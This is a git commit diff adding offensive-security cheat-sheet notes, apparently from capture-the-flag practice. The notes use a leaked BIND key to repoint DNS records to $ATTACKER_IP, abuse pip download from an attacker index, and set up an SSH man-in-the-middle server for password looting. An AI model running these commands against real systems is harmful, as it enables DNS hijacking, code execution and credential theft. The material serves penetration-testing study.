This commit is contained in:
whackx 2023-05-12 19:15:13 +02:00
parent 840daf84da
commit b0b36adea5
5 changed files with 62 additions and 1 deletions

View File

@ -23,3 +23,21 @@ send
quit quit
``` ```
* Check domain by querying the subdomain's A record via dig/drill/nslookup * Check domain by querying the subdomain's A record via dig/drill/nslookup
### Found Secrets for Keys
If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain.
```sh
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
Creating key...
namefromtext
keycreate
server <domain>
update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP
send
```
Copy the lines, every space counts as it has to be exactly like in the example

View File

@ -1,6 +1,6 @@
# Tips & Tricks for Binary Exploitations # Tips & Tricks for Binary Exploitations
# Toggle ASLR ## Toggle ASLR
State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch. State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch.
@ -39,3 +39,10 @@ echo -e '\xde\xad\xc0\xde' | xxd
## NULL bytes in Adresses ## NULL bytes in Adresses
NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes
## Read from running process
Read from a running process' stdout by attaching to the process via strace and read in the following way
```sh
strace -e read -p <ProcessId>
```

12
Exploits/Python/Pip.md Normal file
View File

@ -0,0 +1,12 @@
# PIP Exploits
## pip download
Python pip executes tar files after the download option has been triggered.
Therefore, a hand crafted python module needs to be created and build.
After that pip can be used in the following way
```sh
pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v
```
An in detail blog post has been done by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/)

View File

@ -1,3 +1,10 @@
# SMTP # SMTP
* [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp) * [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp)
## Adhoc SMTP Server
Set up an SMTP Server quickly using `maildev`
```sh
sudo maildev -s 25 --ip $ATTACKER_IP
```

View File

@ -1,5 +1,8 @@
# Man In the Middle # Man In the Middle
## Ettercap
* [Ettercap](https://www.ettercap-project.org/) * [Ettercap](https://www.ettercap-project.org/)
* [Bettercap](https://www.bettercap.org/) * [Bettercap](https://www.bettercap.org/)
@ -19,6 +22,7 @@ if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n"); msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
} }
``` ```
* Escape double quote inside the payload string * Escape double quote inside the payload string
* compile via * compile via
```sh ```sh
@ -29,3 +33,16 @@ etterfilter filter.ef -o filter.ef
```sh ```sh
ettercap -T -i <interface> -M arp -F filter.ef ettercap -T -i <interface> -M arp -F filter.ef
``` ```
## mitm-server
Set up a local Man in the middle server which can be used for example for password looting if somebody logs in.
[SSH-MITM](https://docs.ssh-mitm.at/#) provides this feature. Therefore, download the package via `pip install ssh-mitm`.
Redirect the port to the mitm server and start it afterwards
```sh
((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &)
ssh-mitm server --remote-host $TARGET_IP
```